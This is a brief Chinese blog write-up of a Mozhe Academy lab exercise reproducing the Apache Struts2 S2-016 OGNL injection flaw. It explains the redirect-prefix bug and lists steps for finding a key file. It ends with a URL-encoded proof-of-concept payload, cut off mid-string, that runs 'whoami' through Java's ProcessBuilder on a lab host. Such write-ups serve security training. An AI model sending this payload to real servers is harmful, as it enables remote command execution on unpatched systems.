0x1E. Apache Struts2远程代码执行漏洞(S2-016)复现

半情调

于 2019-10-15 17:06:30 发布

阅读量671

点赞数

CC 4.0 BY-SA版权

分类专栏：墨者学院文章标签：墨者学院 S2-016

本文链接：https://blog.youkuaiyun.com/qq_31679787/article/details/102570638

本文详细介绍了Apache Struts2的S2-016漏洞，该漏洞允许攻击者通过OGNL表达式注入服务器端代码，导致远程代码执行。利用工具检测到该漏洞后，通过特定的PoC命令，可以执行系统命令并读取文件内容。文章提供了PoC示例，并链接到详细的漏洞分析文章。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

s2-016：在2.3.15.1之前的Struts 2中，“ action：”，“ redirect：”或“ redirectAction：”之后的信息未正确清除。由于所述信息将根据值堆栈作为OGNL表达式进行评估，因此这引入了注入服务器端代码的可能性；

使用工具检测s2-016漏洞，发现存在漏洞；

命令执行，发现key.txt;

查看文件，得到key；

poc：

http://219.153.49.228:48008/index.action?redirect%3A%24%7B%23a%3d%28new java.lang.ProcessBuilder%28new java.lang.String%5B%5D%7B%27whoami%27%7D%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew java.io.InputStreamReader%28%23b%29,%23d%3dnew java.io.BufferedReader%28%23c%29,%23e%3dnew char%5B50000%5D,%23d.read%28%23e%29,%23matt%3d%23context